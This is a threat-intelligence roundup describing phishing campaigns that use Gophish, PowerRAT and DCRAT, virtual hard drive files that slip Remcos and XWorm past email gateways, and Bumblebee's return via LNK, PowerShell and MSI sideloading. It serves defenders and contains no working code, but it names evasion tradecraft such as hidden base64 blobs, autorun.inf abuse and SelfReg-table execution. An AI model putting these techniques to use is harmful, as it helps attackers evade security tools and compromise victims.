CTI Roundup: Gophish Toolkit Phishing, Malicious Virtual Hard Drive Files, Return of Bumblebee Malware

This week, CTI explores how a threat actor is leveraging an open-source toolkit called Gophish to conduct phishing campaigns. Next up, CTI investigates how threat actors are embedding malicious content within virtual hard drive files to bypass secure email gateways (SEGs) and antivirus tools. Finally, CTI provides an update on the notorious Bumblebee malware, which appears to be making a resurgence.

Threat actor uses the Gophish toolkit in phishing campaigns

A recent campaign leverages modular infection chains of either maldoc (malicious documents) or HTML-based infections – both of which require interaction from the victim to kick off the rest of the infection chain. Researchers have also discovered a previously undocumented PowerShell RAT (remote access trojan) in the attack.

Using the Gophish toolkit

Cisco Talos analyzed malicious links within these phishing emails and discovered the attacker-controlled hosting domains to deliver a malicious Microsoft Word document and an HTML file.

The domain resolves to an IP address confirmed as an AWS EC2 instance. The same server also reverse-resolves to another domain that delivers malicious HTML files with embedded JavaScript. It was determined that the actor hosted the Gophish toolkit on this server, running at port 3333.

A multi-modular campaign

The campaign has two initial attack vectors:

1. The first attack vector is a malicious Word document.
2. The second attack vector involves using HTML files with embedded malicious JavaScript.

Maldoc-based infection to deliver PowerRAT

In this infection chain, the victim must open the malicious Word document and enable the “view contents” button in the document banner. This action enables the malicious VB (Visual Basic) macro program to execute.

The actor strategically used a base64 encoded data blob in the document but made its text color the same as the background of the document. The macro will drop a malicious .hta (HTML application file) and a PowerShell loader to the victim’s machine.

Cisco Talos also discovered a new PowerShell RAT as one of the payloads executed in this infection chain. The tool executes in the machine memory and can run additional PowerShell scripts and commands. It performs reconnaissance, collects information, writes data to memory, and exfiltrates it.

HTML-based infection to deliver DCRAT

In this example, the actor uses HTML files embedded with malicious JavaScript.

When the victim clicks on a link in the phishing email, an HTML file containing malicious code opens on the machine. At the same time, JavaScript executes, which results in the download of a .zip archive.

The victim must manually unzip the archive and run the executable within it, masquerading as the legitimate VK messenger application. This action will ultimately result in a DCRAT infection.

Analyst comments from Tanium’s Cyber Threat Intelligence team

Both of the actor’s infection chains require some level of interaction on the user’s part to successfully kick off the rest of the attack.

A growing number of attacks rely on user interaction, like the ClickFix attacks that require users to paste and execute a malicious command.

It’s a little surprising to see so many campaigns reliant on user interaction since this leaves room for the attack to be unsuccessful. This is a key example of where user awareness and training can be critical.

Attackers bypass SEGs and antivirus scanners

Cofense discovered that threat actors are embedding malicious content within virtual hard drive files to avoid detection by SEGs and antivirus solutions.

Campaign trends

Cofense observed virtual hard drive files being leveraged as a delivery mechanism in multiple campaigns throughout 2024. The lures vary for each campaign, but all seem to be delivering Remcos RAT and/or XWorm RAT.

• May 2024 campaign: This campaign used phishing emails containing a link that pretended to be a relevant tax document but downloaded a virtual hard drive file instead. After downloading the file, the victim would run the main payload that would deliver Remcos RAT.
• June/July 2024 campaign: In this campaign, phishing emails pretended to be from Canada Post and other various postal services. The emails delivered attached .zip archives under the guise of being a package label but contained a virtual hard drive file. Opening the virtual hard drive file would convince the victim to open a malicious LNK file that would ultimately deliver a DotNETLoader and XWorm RAT, which would then deliver Remcos RAT.
• August 2024 campaign: In August, actors targeted victims with attached .zip archives supposedly containing several curriculum vitae for review but actually contained the same virtual hard drive file and Visual Basic Script file that would run Remcos RAT in memory. This campaign included autorun.inf files, which are configuration files used by older Windows versions to “define actions that can be automatically performed when the volume is mounted.” In these older Windows versions (prior to Windows Vista), the files can be abused to run malware automatically.

Bypassing SEGs

Virtual hard drive files can be delivered via links to legitimate file-sharing services to bypass SEGs. However, they also seem to be able to bypass SEGs on their own account.

Many SEGs are unable to scan virtual hard drive files. Some of those that can scan virtual hard drive files do so by relying on antivirus solutions that may also have a hard time detecting malicious content contained within hard drive images.
In the above-mentioned curriculum vitae-themed campaign, the actors were able to bypass Cisco, Proofpoint, and FireEye SEGs.

Analyst comments from Tanium’s Cyber Threat Intelligence team

It’s not a total shock that threat actors are looking for new ways of delivering malicious content, especially one capable of bypassing many email security solutions.

This is similar to when threat actors pivoted to using QR codes in phishing emails — a technique known as “quishing” — that is still common. Right now, these virtual hard drive files seem capable of bypassing some solutions, which will make other threat actors likely interested in leveraging these files in their attacks.

Because of this, we will probably see vendors begin to investigate ways to provide effective detection of these malicious files, as we are seeing with QR code phishing.

[Read also: To defend against vishing, get smart]

Bumblebee malware returns after disruption

Researchers have spotted the notorious Bumblebee malware loader in recent attacks, indicating a possible resurgence.

These observations come just a few months after international law enforcement seized several servers worldwide, impacting multiple malware loader operations, including Bumblebee.

Initial access

Researchers believe these latest attacks begin with a phishing email that tricks victims into downloading a malicious .zip file. The .zip file contains an LNK file that will kick off the attack and result in the execution of the Bumblebee payload in memory.

LNK and PowerShell

Like past Bumblebee campaigns, this latest campaign uses LNK files and PowerShell. In this campaign the file was used as a downloader and would download and execute the next stage.

After opening the LNK file, it will execute a PowerShell command to download an MSI file. The file gets renamed as %AppData%\y.msi and runs using msiexec.

New MSI approach

The Bumblebee malware family now appears to be delivering malware via MSI files. Other malware families like DarkGate and Latrodectus have also used MSI files to execute payloads.

Netskope looked at a few samples disguised as either NVIDIA or Midjourney installers. They were all observed loading and executing the payload in memory without dropping it to disk.

Bumblebee appears to be using a stealthy approach to avoid the creation of other processes. Netskope has observed the malware using the SelfReg table to force the execution of an export function. This works as a key to determine the file to execute in the table, which, in the case observed by Netskope, was the final payload DLL. The DLL is in a CAB file. After the MSI installation begins, the DLL is sideloaded in the msiexec process, and the Bumblebee payload is unpacked and executed.

Bumblebee payload

Researchers identified some of the more well-known characteristics of the Bumblebee malware family in the unpacked payload. They determined that the configuration extraction approach is identical to previous Bumblebee versions.

Analyst comments from Tanium’s Cyber Threat Intelligence team

Netskope’s discovery of new campaigns involving the Bumblebee malware indicates a possible resurgence of the notorious malware family.

While disruption efforts from law enforcement agencies are certainly a step in the right direction, they’re not a permanent solution. Bumblebee was quite successful at its peak, making this potential resurgence something to keep an eye on.

Do you have insight into these stories that you want to share? Head over to Tanium’s discussion forum to start a conversation.

For further reading, catch up on our recent cyber threat intelligence roundups.